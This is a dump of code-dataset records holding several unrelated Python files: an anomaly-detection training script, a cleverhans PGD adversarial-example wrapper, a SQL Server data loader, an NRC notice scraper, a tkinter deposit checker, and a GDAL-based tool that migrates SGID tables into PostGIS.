x_dec)\n norm = ms.numpy.norm(delta, ord=2, axis=1)\n return norm\n\n\nif __name__ == '__main__':\n\n os.environ['ASCEND_GLOBAL_LOG_LEVEL'] = '4'\n os.environ['ASCEND_SLOG_PRINT_TO_STDOUT'] = '0'\n start_time_ = time.time()\n time_name = str(time.strftime(\"%m%d\")) + '_' + \\\n str(time.time()).split(\".\")[1][-3:]\n print(f'Time name is {time_name}')\n print(os.getcwd())\n metrics = pd.DataFrame()\n\n args = cfg\n\n if args.ms_mode == \"GRAPH\":\n context.set_context(mode=context.GRAPH_MODE)\n else:\n context.set_context(mode=context.PYNATIVE_MODE)\n\n context.set_context(device_target=args.device, device_id=0)\n\n if args.data_name in ['attack', 'bcsc', 'creditcard', 'diabetic', 'donor', 'intrusion', 'market']:\n an_metrics_dict = train_tabular(args)\n elif args.data_name in ['reuters', '20news']:\n an_metrics_dict = train_document(args)\n elif args.data_name in ['mnist']:\n an_metrics_dict = train_image(args)\n\n metrics = pd.DataFrame(an_metrics_dict, index=[0])\n metrics.to_csv(\n f'{args.out_dir}{args.model_name}_{args.data_name}_{time_name}.csv')\n\n print(f'Finished!\\nTotal time is 
{time.time()-start_time_:.2f}s')\n print(f'Current time is {time.strftime(\"%m%d_%H%M\")}')\n print(f'Results:')\n print(metrics.sort_values('AUC', ascending=False))\n ","sub_path":"community/cv/SGAE/.ipynb_checkpoints/SGAE_train-checkpoint.py","file_name":"SGAE_train-checkpoint.py","file_ext":"py","file_size_in_byte":19951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"370805216","text":"import torch\nfrom torch import nn\nimport numpy as np\nfrom cleverhans.torch.attacks.projected_gradient_descent import projected_gradient_descent as _pgd_fn\n\n\nclass ProjectedGradientDescent:\n def __init__(self, net, eps=0.07, a=0.01, K=40, norm=np.inf,\n max_min_bounds=None):\n self.net = net\n\n # variables\n self.eps = eps\n self.a = a\n self.K = K\n self.norm = norm\n self.max_min_bounds = max_min_bounds\n\n def __call__(self, x, eps=None):\n if eps is None:\n eps = self.eps\n return pgd_fn(self.net, x, eps, self.a, self.K, self.norm,\n self.max_min_bounds[0], self.max_min_bounds[1])\n\n\ndef pgd_fn(net, x, eps=0.07, a=0.01, K=40, norm=np.inf, max_bound=None,\n min_bound=None):\n adv_x = _pgd_fn(\n model_fn=net,\n x=x,\n eps=eps,\n eps_iter=a,\n nb_iter=K,\n norm=norm,\n clip_max=max_bound,\n clip_min=min_bound,\n sanity_checks=False)\n return adv_x\n","sub_path":"models/adversarial/untargeted/pgd.py","file_name":"pgd.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"374860593","text":"import pandas as pd\r\nimport pyodbc\r\nimport random\r\nconnection = pyodbc.connect('Driver={SQL Server};'\r\n 'Server=DESKTOP-4ONR3F7\\MSSQLSERVER01;'\r\n 'Database=DBMS;'\r\n 'Trusted_Connection=yes;')\r\nmycursor = connection.cursor()\r\ndef maketables():\r\n df=pd.read_csv('naukri_com-job_sample.csv')\r\n df1=pd.read_csv('candidate.csv')\r\n kf=pd.read_csv('user-languages.csv')\r\n qdf=pd.read_csv('questions.csv')\r\n skill_name=[]\r\n ctr=0\r\n a=list(df['jobtitle'])\r\n b=list(df['joblocation_address'])\r\n c=list(df['jobid'])\r\n d=list(df['jobdescription'])\r\n candidate_name=list(df1['Employee_Name'])\r\n candidate_id=list(df1['EmpID'])\r\n candidateage=[i for i in range(20,30)]\r\n employeeage=[i for i in range(25,65)]\r\n question_id=qdf['QCode']\r\n question_description=qdf['link']\r\n question_difficulty=qdf['level']\r\n question_tags=qdf['Tags']\r\n question_editorial=qdf['Editorial']\r\n for i in range(1,len(kf.columns)):\r\n if kf.columns[i] not in skill_name:\r\n ctr+=1\r\n skill_name.append(kf.columns[i])\r\n education=list(df['education'])\r\n experience=list(df['experience'])\r\n t0=[]\r\n t1=[]\r\n t2=[]\r\n t3=[]\r\n t4=[]\r\n t5=[]\r\n t6=[]\r\n t7=[]\r\n t8=[]\r\n t9=[]\r\n t10=[]\r\n sql11=\"insert into QUESTION_TAGS(QUESTION_ID,TAGS) values (?,?)\"\r\n sql10=\"insert into INTERVIEWER(EMPLOYEE_ID) values (?)\"\r\n sql9=\"insert into QUESTION_DIFFICULTY(QUESTION_ID,DIFFICULTY) values (?,?)\"\r\n sql8=\"insert into QUESTION_EXPLANATION(QUESTION_ID,EXPLANATION) values (?,?)\"\r\n sql7=\"insert into QUESTION(QUESTION_DESCRIPTION) values (?)\"\r\n sql6=\"insert into EMPLOYEE(EMPLOYEE_NAME,EMPLOYEE_AGE,EMPLOYEE_POSITION) values (?,?,?)\"\r\n sql5=\"insert into SKILLS(CANDIDATE_ID,SKILL_ID,LEVEL) values (?,?,?)\"\r\n sql3=\"insert into CANDIDATE(EXPERIENCE,NAME,AGE,EDUCATION,ROLE) values (?,?,?,?,?)\"\r\n sql1=\"insert into JOB_DETAILS(LOCATION,JOB_TITLE,FILLED) values (?,?,?)\"\r\n sql2=\"insert into JOB_ROLE(JOB_TITLE,JOB_DESCRIPTION) 
values (?,?)\"\r\n sql4=\"insert into SKILL_DETAILS(SKILL_NAME) values (?)\"\r\n interviewer_id=[]\r\n for i in range(1,76):\r\n for location in b[i].split(','):\r\n t0.append((location,a[i],'False'))\r\n t1.append((a[i],d[i][41:]))\r\n if str(education[i])=='nan':\r\n ede=None\r\n else:\r\n ede=str(education[i])\r\n t2.append((str(experience[i]),str(candidate_name[i]),random.choice(candidateage),ede,random.randint(76,123)))\r\n t5.append((str(candidate_name[i+76]),random.choice(employeeage),i))\r\n if len(interviewer_id)<37:\r\n while 1:\r\n curinterviewer_id=random.randint(1,75)\r\n if curinterviewer_id not in interviewer_id:\r\n break \r\n t9.append((curinterviewer_id,))\r\n interviewer_id.append(curinterviewer_id)\r\n \r\n for i in range(1,ctr):\r\n t3.append((skill_name[i],))\r\n for i in range(1,76):\r\n w=[]\r\n while len(w)<3:\r\n a=random.randint(1,1409)\r\n if a not in w:\r\n w.append(a)\r\n for j in range(3):\r\n t4.append((i,w[j],random.randint(0,10)))\r\n for i in range(1,len(question_id)+1):\r\n str1=\"\"\r\n for j in question_tags[i-1]:\r\n if j=='[' or j==']':\r\n pass\r\n elif j!=',':\r\n str1+=j\r\n else:\r\n str1+=\" \"\r\n str1=str1.split()\r\n t6.append((str(question_description[i-1]),))\r\n if str(question_editorial[i-1])=='nan':\r\n ed=None\r\n else:\r\n ed=str(question_editorial[i-1])\r\n t7.append((i,ed))\r\n t8.append((i,str(question_difficulty[i-1])))\r\n for k in str1:\r\n t10.append((i,k))\r\n for job in range(75):\r\n t0[job]=(t0[job][0],t0[job][1],\"True\")\r\n mycursor.executemany(sql1,t0)\r\n mycursor.executemany(sql2,t1)\r\n mycursor.executemany(sql3,t2)\r\n mycursor.executemany(sql4,t3)\r\n mycursor.executemany(sql5,t4)\r\n mycursor.executemany(sql6,t5)\r\n mycursor.executemany(sql7,t6)\r\n mycursor.executemany(sql8,t7)\r\n mycursor.executemany(sql9,t8)\r\n mycursor.executemany(sql10,t9)\r\n mycursor.executemany(sql11,t10)\r\n connection.commit()\r\n\r\ndef makeinterviewtable():\r\n result=['SOLVED','UNSOLVED','PARTIALLY SOLVED']\r\n interviewerID=list(mycursor.execute('select INTERVIEWER_ID from INTERVIEWER'))\r\n candidates=list(mycursor.execute('select CANDIDATE_ID,STATUS from CANDIDATE'))\r\n q=list(mycursor.execute('select QUESTION_ID from QUESTION'))\r\n for i in range(len(candidates)):\r\n if candidates[i][1]=='entry recieved':\r\n curinterviewer=random.choice(interviewerID)\r\n candidate_ID=candidates[i][0]\r\n res=random.choice(result)\r\n if res=='SOLVED':\r\n score=10\r\n elif res=='UNSOLVED':\r\n score=0\r\n else:\r\n score=None\r\n question_current=random.choice(q)\r\n sql1=\"insert into INTERVIEW(CANDIDATE_ID,INTERVIEWER_ID,RESULT,SCORE) output Inserted.INTERVIEW_ID values (?,?,?,?)\"\r\n mycursor.execute('update CANDIDATE SET STATUS=\\'ongoing\\' WHERE CANDIDATE_ID=?',candidate_ID)\r\n interviewid=mycursor.execute(sql1,(candidate_ID,curinterviewer[0],res,score)).fetchone()[0]\r\n sql2=\"insert into MAP(INTERVIEW_ID,QUESTION_ID) values (?,?)\"\r\n mycursor.execute(sql2,(interviewid,question_current[0]))\r\n connection.commit()\r\n \r\n \r\n \r\n \r\n \r\nmaketables()\r\nmakeinterviewtable()\r\n\r\n\r\n\r\n","sub_path":"dbms1.py","file_name":"dbms1.py","file_ext":"py","file_size_in_byte":5717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"486140288","text":"#! 
python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 5 15:40:54 2017\r\n\r\n@author: JBC4\r\n\r\nThis program scrapes the NRC public webpage for Generic Communications\r\n\r\n\"\"\"\r\n\r\nimport requests, bs4, re\r\nimport pandas as pd\r\n\r\nNRCproxies = { \r\n 'http': 'http://148.184.186.50:80',\r\n 'https': 'http://148.184.186.50:80',\r\n}\r\n\r\n\r\n# find all the IN references in a page\r\nregwebAddress = 'https://www.nrc.gov/reading-rm/doc-collections/gen-comm/info-notices/'\r\nmlWebString = 'https://www.nrc.gov/docs/'\r\n\r\ndf = pd.DataFrame()\r\n\r\nyears = list(range(1979,2020))\r\n\r\nfor i in range(0, len(years)):\r\n \r\n # read html table from site:\r\n df_list=pd.read_html(regwebAddress+str(years[i])+'/')\r\n dfToAppend = df_list[1]\r\n \r\n # remove junk columns and top row and synch column names:\r\n del dfToAppend[2]\r\n del dfToAppend[4]\r\n dfToAppend = dfToAppend.drop(dfToAppend.index[0]) # Drop titles row\r\n dfToAppend = dfToAppend.reset_index(drop=True) # reset row indices\r\n dfToAppend['Link']=\"\"\r\n dfToAppend.rename(columns = {0:'Number', 1:'Title', \r\n 3:'Date'}, inplace = True)\r\n \r\n # Get ML numbers and hyperlinks:\r\n res = requests.get(regwebAddress+str(years[i])+'/',proxies=NRCproxies)\r\n res.raise_for_status()\r\n gcSoup = bs4.BeautifulSoup(res.text, \"lxml\")\r\n \r\n if years[i] == 2002:\r\n table = gcSoup.find('table',{'summary':'NRC Information Notices: xxxx Index'})\r\n else:\r\n table = gcSoup.find('table',{'summary':'NRC Information Notices: ' +str(years[i])+' Index'})\r\n \r\n tableRows = table.find_all('tr')\r\n inRegex = re.compile(r'IN-\\d\\d-\\d+\\s\\w+.*\\s--\\s.*')\r\n\r\n for j in range(1,len(tableRows)): # for each table row (except title row)\r\n tableRowString=str(tableRows[j]) \r\n \r\n for k in range(0,len(dfToAppend['Number'])): # for each IN number\r\n testString = dfToAppend['Number'][k]\r\n if testString in tableRowString: #if you find it\r\n linkSoup = bs4.BeautifulSoup(tableRowString,\"lxml\")\r\n inLink = linkSoup.find_all('a',href=True)\r\n if inLink: # if there's a link, use it\r\n if years[i]==1990: #1990 links are different than others\r\n dfToAppend['Link'][k]='https://www.nrc.gov/reading-rm/doc-collections/gen-comm/info-notices/1990/'+inLink[0].attrs['href']\r\n elif testString =='IN-85-11': # IN 85-11 is linked wrong on site\r\n dfToAppend['Link'][k]='https://www.nrc.gov/reading-rm/doc-collections/gen-comm/info-notices/1985/'+inLink[0].attrs['href']\r\n \r\n else:\r\n dfToAppend['Link'][k]='https://www.nrc.gov'+inLink[0].attrs['href']\r\n else: # if not, use the general table link\r\n dfToAppend['Link'][k]=regwebAddress+str(years[i])+'/'\r\n \r\n # append dataframes\r\n if i ==0:\r\n df = dfToAppend\r\n else:\r\n df = df.append(dfToAppend,ignore_index=True)\r\n\r\n\r\n# drop rows with junk titles \"--\"\r\ndf = df[~df['Number'].str.contains('--')] \r\ndf.to_excel(\"Information Notices - Scraped from Public Site.xlsx\") \r\n","sub_path":"getINtables3.py","file_name":"getINtables3.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"252556109","text":"from tkinter import *\nfrom tkinter import messagebox\n\nroot = Tk()\n\nroot.geometry(\"450x400\")\nroot.title(\"Malaysia trip\")\nroot.config(bg=\"cyan\")\n\nresults = IntVar()\n\nent_lab = Label(root, text=\"Enter amount: \", bg=\"cyan\").place(x=10, y=70)\nuser_ent = Entry(root)\nuser_ent.place(x=120, y=70)\nuser_ent.focus()\n\ndef submit():\n if 
int(user_ent.get()) < 3000:\n raise Exception(messagebox.showinfo(\"STATUS FEEDBACK\", \"Please deposit more funds for this excursion\"))\n else:\n messagebox.showinfo(\"STATUS FEEDBACK\", \"You qualify for the malaysia trip. Congratulations\")\n\ndef exit():\n root.destroy()\n\nexit_btn = Button(root, text=\"Exit\", borderwidth=5, bg=\"blue\", command=exit).place(x=220, y=120)\ndeposit_btn = Button(root, text=\"Deposit\", borderwidth=5, bg=\"blue\", command=submit).place(x=120, y=120)\n\nroot.mainloop()\n","sub_path":"qulification_section.py","file_name":"qulification_section.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"333318059","text":"#!/usr/bin/env python\n# * coding: utf8 *\n'''\ncloudb\n\nUsage:\n cloudb enable extensions [--verbosity=]\n cloudb create schema [--schemas= --verbosity=]\n cloudb create admin-user [--verbosity=]\n cloudb create read-only-user [--verbosity=]\n cloudb drop schema [--schemas= --verbosity=]\n cloudb import [--missing --dry-run --verbosity= --skip-if-exists]\n cloudb trim [--dry-run --verbosity=]\n cloudb update [--table=... --dry-run --verbosity= --from-change-detection]\n\nArguments:\n name - all or any of the other iso categories\n level - VERBOSE DEBUG INFO WARNING FATAL\n'''\n\nimport sys\nfrom datetime import datetime\nfrom pathlib import Path\nfrom time import perf_counter\n\nimport psycopg2\nfrom colorama import Back, Fore, init\nfrom docopt import docopt\nfrom osgeo import gdal, ogr\n\nimport pyodbc\n\nfrom . import CONNECTION_TABLE_CACHE, LOG, config, roles, schema, utils\n\ngdal.SetConfigOption('MSSQLSPATIAL_LIST_ALL_TABLES', 'YES')\ngdal.SetConfigOption('PG_LIST_ALL_TABLES', 'YES')\ngdal.SetConfigOption('PG_USE_POSTGIS', 'YES')\ngdal.SetConfigOption('PG_USE_COPY', 'YES')\n\n\ndef execute_sql(sql, connection):\n '''executes sql on the information\n sql: string T-SQL\n connection: dict with connection information\n '''\n LOG.debug(f' executing {sql}')\n\n with psycopg2.connect(**connection) as conn:\n with conn.cursor() as cursor:\n cursor.execute(sql)\n\n conn.commit()\n\n\ndef enable_extensions():\n '''enable the database extension\n owner: string db owner\n '''\n LOG.info('enabling extensions')\n\n execute_sql('CREATE EXTENSION postgis;CREATE EXTENSION pg_stat_statements;', config.DBO_CONNECTION)\n\n\ndef _get_tables_with_fields(connection_string, specific_tables):\n '''creates a list of tables with fields from the connection string\n connection_string: string to connect to db\n specific_tables: array of tables to get in schema.table format\n returns: array of tuples with 0: schema, 1: table name: 2: array of field names\n '''\n layer_schema_map = []\n filter_tables = False\n\n if specific_tables and len(specific_tables) > 0:\n LOG.debug(f'{Fore.CYAN}filtering for specific tables{Fore.RESET}')\n\n filter_tables = True\n\n LOG.verbose('connecting to database')\n connection = gdal.OpenEx(connection_string)\n\n LOG.verbose('getting layer count')\n table_count = connection.GetLayerCount()\n\n LOG.info(f'discovered {Fore.YELLOW}{table_count}{Fore.RESET} tables')\n\n for table_index in range(table_count):\n qualified_layer = connection.GetLayerByIndex(table_index)\n schema_name, layer = qualified_layer.GetName().split('.')\n schema_name = schema_name.lower()\n layer = layer.lower()\n\n LOG.debug(f'- {Fore.CYAN}{schema_name}.{layer}{Fore.RESET}')\n\n if schema_name in config.EXCLUDE_SCHEMAS or filter_tables and f'{schema_name}.{layer}' not in 
specific_tables:\n LOG.verbose(f' {Fore.RED}- skipping:{Fore.RESET} {schema_name}')\n\n continue\n\n definition = qualified_layer.GetLayerDefn()\n\n fields = []\n for field_index in range(definition.GetFieldCount()):\n field = definition.GetFieldDefn(field_index)\n\n field_name = field.GetName().lower()\n\n if field_name in config.EXCLUDE_FIELDS:\n LOG.verbose(f' {Fore.YELLOW}- skipping:{Fore.RESET} {field_name}')\n\n continue\n\n fields.append(field_name)\n\n layer_schema_map.append((schema_name, layer, fields))\n\n del qualified_layer\n\n schema_map_count = len(layer_schema_map)\n noun = 'tables'\n if schema_map_count == 1:\n noun = 'table'\n\n LOG.info(f'planning to import {Fore.GREEN}{schema_map_count}{Fore.RESET} {noun}')\n layer_schema_map.sort(key=lambda items: items[0])\n\n connection = None\n\n return layer_schema_map\n\n\ndef _get_schema_table_name_map(table_name):\n '''a method to split a qualified table into it's parts\n '''\n parts = table_name.split('.')\n\n schema_index = 1\n table_index = 2\n\n if len(parts) == 2:\n schema_index = 0\n table_index = 1\n\n return {'schema': parts[schema_index].lower(), 'table_name': parts[table_index].lower()}\n\n\ndef _format_title_for_pg(title):\n if title is None:\n return title\n\n new_title = title.lower()\n new_title = new_title.replace('utah ', '', 1).replace(' ', '_')\n\n LOG.verbose(f'updating {Fore.MAGENTA}{title}{Fore.RESET} to {Fore.CYAN}{new_title}{Fore.RESET}')\n\n return new_title\n\n\ndef _get_table_meta():\n '''gets the meta data about fields from meta.agolitems\n '''\n mapping = {}\n\n with pyodbc.connect(config.get_source_connection()[6:]) as connection:\n cursor = connection.cursor()\n\n cursor.execute(\"SELECT [TABLENAME],[AGOL_PUBLISHED_NAME],[GEOMETRY_TYPE] FROM [SGID].[META].[AGOLITEMS]\")\n rows = cursor.fetchall()\n\n #: table: SGID.ENVIRONMENT.DAQPermitCompApproval\n #: title: Utah Retail Culinary Water Service Areas\n #: geometry_type: POINT POLYGON POLYLINE\n for table, title, geometry_type in rows:\n table_parts = _get_schema_table_name_map(table)\n pg_title = _format_title_for_pg(title)\n\n schema_name = mapping.setdefault(table_parts['schema'], {})\n schema_name[table_parts['table_name']] = {'title': pg_title, 'geometry_type': geometry_type}\n\n return mapping\n\n\ndef _populate_table_cache(connection_string, pgify=False, name_map=None):\n '''adds all the table from a connection string to a dictionary for caching purposes\n pgify: lowercases and adds underscores\n name_map: is a dictionary to replace names from the meta table\n '''\n skip_schema = ['meta', 'sde']\n LOG.verbose('connecting to database')\n #: gdal.open gave a 0 table count\n connection = ogr.Open(connection_string)\n\n LOG.verbose('getting layer count')\n table_count = connection.GetLayerCount()\n\n LOG.debug(f'found {Fore.YELLOW}{table_count}{Fore.RESET} total tables for cache')\n CONNECTION_TABLE_CACHE.setdefault(connection_string, [])\n\n for table_index in range(table_count):\n qualified_layer = connection.GetLayerByIndex(table_index)\n table = None\n\n if qualified_layer:\n name = qualified_layer.GetName()\n LOG.verbose(f'qualified layer name: {name}')\n\n if '.' 
not in name:\n continue\n\n table_parts = _get_schema_table_name_map(name)\n name = f\"{table_parts['schema']}.{table_parts['table_name']}\"\n\n if table_parts['schema'] in skip_schema:\n continue\n\n if pgify:\n pg_title = _format_title_for_pg(table_parts['table_name'])\n schema_name = table_parts['schema']\n\n if schema_name in name_map and pg_title in name_map[schema_name]:\n table, _ = name_map[schema_name][pg_title].values()\n else:\n continue\n\n name = f\"{schema_name}.{table}\"\n\n LOG.verbose(f'found layer: {name}')\n\n CONNECTION_TABLE_CACHE[connection_string].append(name)\n\n del qualified_layer\n connection = None\n\n\ndef _check_if_exists(connection_string, schema_name, table, agol_meta_map):\n '''returns true or false if a table exists in the connections_string db\n connection_string: string of db to check\n schema_name: string schema name\n table: string table name\n returns: bool\n '''\n LOG.debug('checking cache')\n\n if schema_name in agol_meta_map and table in agol_meta_map[schema_name]:\n table, _ = agol_meta_map[schema_name][table].values()\n\n if connection_string in CONNECTION_TABLE_CACHE and len(CONNECTION_TABLE_CACHE[connection_string]) > 0:\n LOG.verbose('cache hit')\n\n return f'{schema_name}.{table}' in CONNECTION_TABLE_CACHE[connection_string]\n\n LOG.verbose('cache miss')\n _populate_table_cache(connection_string)\n\n found = False\n if f'{schema}.{table}' in CONNECTION_TABLE_CACHE[connection_string]:\n found = True\n\n return found\n\n\ndef _replace_data(schema_name, layer, fields, agol_meta_map, dry_run):\n '''the insert logic for writing to the destination\n '''\n cloud_db = config.format_ogr_connection(config.DBO_CONNECTION)\n internal_sgid = config.get_source_connection()\n\n sql = f'SELECT objectid FROM \"{schema_name}.{layer}\"'\n\n if len(fields) > 0:\n #: escape reserved words?\n fields = [f'\"{field}\"' for field in fields]\n sql = f\"SELECT {','.join(fields)} FROM \\\"{schema_name}.{layer}\\\"\"\n\n options = [\n '-f',\n 'PostgreSQL',\n '-dialect',\n 'OGRSQL',\n '-sql',\n sql,\n '-lco',\n 'FID=xid',\n '-lco',\n f'SCHEMA={schema_name}',\n '-lco',\n 'OVERWRITE=YES',\n '-lco',\n 'GEOMETRY_NAME=shape',\n '-lco',\n 'PRECISION=YES',\n '-a_srs',\n config.UTM,\n ]\n\n if schema_name in agol_meta_map and layer in agol_meta_map[schema_name]:\n new_name, geometry_type = agol_meta_map[schema_name][layer].values()\n\n if new_name:\n layer = new_name\n\n if geometry_type == 'POLYGON':\n options.append('-nlt')\n options.append('MULTIPOLYGON')\n elif geometry_type == 'POLYLINE':\n options.append('-nlt')\n options.append('MULTILINESTRING')\n elif geometry_type == 'STAND ALONE':\n options.append('-nlt')\n options.append('NONE')\n else:\n options.append('-nlt')\n options.append(geometry_type)\n else:\n LOG.info(f'- skipping {Fore.MAGENTA}{layer}{Fore.RESET} since it is no longer in the meta table{Fore.RESET}')\n\n return\n\n options.append('-nln')\n options.append(f'{layer}')\n\n pg_options = gdal.VectorTranslateOptions(options=options)\n\n LOG.info(f'- inserting {Fore.MAGENTA}{layer}{Fore.RESET} into {Fore.BLUE}{schema_name}{Fore.RESET} as {Fore.CYAN}{geometry_type}{Fore.RESET}')\n LOG.debug(f'with {Fore.CYAN}{sql}{Fore.RESET}')\n\n if not dry_run:\n start_seconds = perf_counter()\n result = gdal.VectorTranslate(cloud_db, internal_sgid, options=pg_options)\n LOG.debug(f'- {Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n del result\n\n LOG.debug(f'- {Fore.CYAN}make valid{Fore.RESET}')\n 
make_valid(f'{schema_name}.{layer}')\n\n\ndef import_data(if_not_exists, missing_only, dry_run):\n '''imports data from sql to postgis\n if_not_exists: create new tables if the destination does not have it\n dry_run: do not modify the destination\n missing_only: only import missing tables\n '''\n cloud_db = config.format_ogr_connection(config.DBO_CONNECTION)\n internal_sgid = config.get_source_connection()\n\n tables = []\n if missing_only:\n source, destination = _get_table_sets()\n tables = destination - source\n\n table_count = len(tables)\n\n verb = 'are'\n noun = 'tables'\n if table_count == 1:\n verb = 'is'\n noun = 'table'\n\n LOG.info(f'there {verb} {Fore.CYAN}{table_count}{Fore.RESET} {noun} in the source not in the destination')\n LOG.verbose(','.join(tables))\n\n if table_count == 0:\n return\n\n agol_meta_map = _get_table_meta()\n\n if missing_only:\n origin_table_name = []\n\n #: reverse lookup the table names\n for table in tables:\n schema_name, table_name = table.split('.')\n schema_name = schema_name.lower()\n table_name = table_name.lower()\n\n schema_items = agol_meta_map[schema_name]\n for origin_name in schema_items:\n if schema_items[origin_name]['title'] == table_name:\n origin_table_name.append(f'{schema_name}.{origin_name}')\n break\n\n if len(origin_table_name) > 0:\n tables = origin_table_name\n\n layer_schema_map = _get_tables_with_fields(internal_sgid, tables)\n\n for schema_name, layer, fields in layer_schema_map:\n if if_not_exists and _check_if_exists(cloud_db, schema_name, layer, agol_meta_map):\n LOG.info(f'- skipping {Fore.MAGENTA}{schema_name}.{layer} {Fore.CYAN}already exists{Fore.RESET}')\n\n continue\n\n _replace_data(schema_name, layer, fields, agol_meta_map, dry_run)\n\n\ndef _get_table_sets():\n '''gets a set of each schema.tablename from the source and destination database to help figure out what is different between them\n '''\n cloud_db = config.format_ogr_connection(config.DBO_CONNECTION)\n internal_sgid = config.get_source_connection()\n\n if cloud_db not in CONNECTION_TABLE_CACHE:\n _populate_table_cache(cloud_db)\n\n if internal_sgid not in CONNECTION_TABLE_CACHE:\n _populate_table_cache(internal_sgid, pgify=True, name_map=_get_table_meta())\n\n source = set(CONNECTION_TABLE_CACHE[cloud_db])\n destination = set(CONNECTION_TABLE_CACHE[internal_sgid])\n\n return source, destination\n\n\ndef trim(dry_run):\n '''get source tables with updated names\n get destination tables with original names\n drop the tables in the destination found in the difference between the two sets\n '''\n\n source, destination = _get_table_sets()\n items_to_trim = source - destination\n items_to_trim_count = len(items_to_trim)\n\n verb = 'are'\n noun = 'tables'\n if items_to_trim_count == 1:\n verb = 'is'\n noun = 'table'\n\n LOG.info(f'there {verb} {Fore.CYAN}{items_to_trim_count}{Fore.RESET} {noun} in the destination not in the source')\n LOG.verbose(','.join(items_to_trim))\n\n if items_to_trim_count == 0:\n return\n\n sql = f'DROP TABLE {\",\".join(items_to_trim)}'\n LOG.info(f'dropping {items_to_trim}')\n\n if not dry_run:\n execute_sql(sql, config.DBO_CONNECTION)\n\n LOG.info(f'{Fore.GREEN}finished{Fore.RESET}')\n\n\ndef update(specific_tables, dry_run):\n '''update specific tables in the destination\n specific_tables: a list of tables from the source without the schema\n dry_run: bool if insertion should actually happen\n '''\n internal_sgid = config.get_source_connection()\n\n if not specific_tables or len(specific_tables) == 0:\n LOG.info(f'{Fore.YELLOW} no 
tables to import!{Fore.RESET}')\n\n return\n\n layer_schema_map = _get_tables_with_fields(internal_sgid, specific_tables)\n\n if len(layer_schema_map) == 0:\n LOG.info(f'{Fore.YELLOW} no matching table found!{Fore.RESET}')\n\n return\n\n agol_meta_map = _get_table_meta()\n\n if len(specific_tables) != len(layer_schema_map):\n LOG.warn((\n f'{Back.YELLOW}{Fore.BLACK}input {len(specific_tables)} tables but only {len(layer_schema_map)} found.{Fore.RESET}{Back.RESET} '\n 'check your spelling'\n ))\n\n for schema_name, layer, fields in layer_schema_map:\n _replace_data(schema_name, layer, fields, agol_meta_map, dry_run)\n\n\ndef read_last_check_date():\n last_checked = Path('./.last_checked')\n\n if not last_checked.exists():\n last_checked.touch()\n\n last_date_string = ''\n with open(last_checked, 'r') as log_file:\n last_date_string = log_file.readline().strip()\n\n if last_date_string is None or len(last_date_string) < 1:\n return None\n\n return last_date_string\n\n\ndef update_last_check_date():\n last_checked = Path('./.last_checked')\n\n if not last_checked.exists():\n last_checked.touch()\n\n with open(last_checked, 'w') as log_file:\n log_file.write(datetime.today().strftime('%Y-%m-%d'))\n\n\ndef get_tables_from_change_detection():\n last_checked = read_last_check_date()\n\n if last_checked is None:\n last_checked = datetime.today()\n else:\n last_checked = datetime.strptime(last_checked, '%Y-%m-%d')\n\n LOG.info(f'Checking for changes since {Fore.MAGENTA}{last_checked}{Fore.RESET}')\n\n updated_tables = []\n with pyodbc.connect(config.get_source_connection()[6:]) as connection:\n cursor = connection.cursor()\n\n cursor.execute(\"SELECT [TABLE_NAME] FROM [SGID].[META].[CHANGEDETECTION] WHERE [LAST_MODIFIED] >= ?\", last_checked)\n rows = cursor.fetchall()\n\n #: table: SGID.ENVIRONMENT.DAQPermitCompApproval\n for table, in rows:\n table_parts = _get_schema_table_name_map(table)\n\n table_schema = table_parts['schema']\n table_name = table_parts['table_name']\n updated_tables.append(f'{table_schema}.{table_name}')\n\n update_last_check_date()\n\n return updated_tables\n\n\ndef make_valid(layer):\n '''update invalid shapes in postgres\n '''\n sql = f'UPDATE {layer} SET shape = ST_MakeValid(shape) WHERE ST_IsValid(shape) = false;'\n\n unfixable_layers = ['utilities.broadband_service']\n if layer in unfixable_layers:\n return\n\n try:\n execute_sql(sql, config.DBO_CONNECTION)\n except psycopg2.errors.UndefinedColumn:\n #: table doesn't have shape field\n pass\n\n\ndef main():\n '''Main entry point for program. 
Parse arguments and pass to sweeper modules.\n '''\n init()\n args = docopt(__doc__, version='1.0.0')\n\n start_seconds = perf_counter()\n\n LOG.init(args['--verbosity'])\n LOG.debug(f'{Back.WHITE}{Fore.BLACK}{args}{Back.RESET}{Fore.RESET}')\n\n if args['enable']:\n enable_extensions()\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n if args['create']:\n if args['schema']:\n name = args['--schemas']\n\n if name is None or name == 'all':\n schema.create_schemas(config.SCHEMAS)\n sys.exit()\n\n name = name.lower()\n\n if name in config.SCHEMAS:\n schema.create_schemas([name])\n sys.exit()\n\n if args['admin-user']:\n roles.create_admin_user(config.ADMIN)\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n if args['read-only-user']:\n roles.create_read_only_user(config.SCHEMAS)\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n if args['drop']:\n if args['schema']:\n name = args['--schemas']\n\n if name is None or name == 'all':\n schema.drop_schemas(config.SCHEMAS)\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n name = name.lower()\n\n if name in config.SCHEMAS:\n schema.drop_schemas([name])\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n if args['import']:\n import_data(args['--skip-if-exists'], args['--missing'], 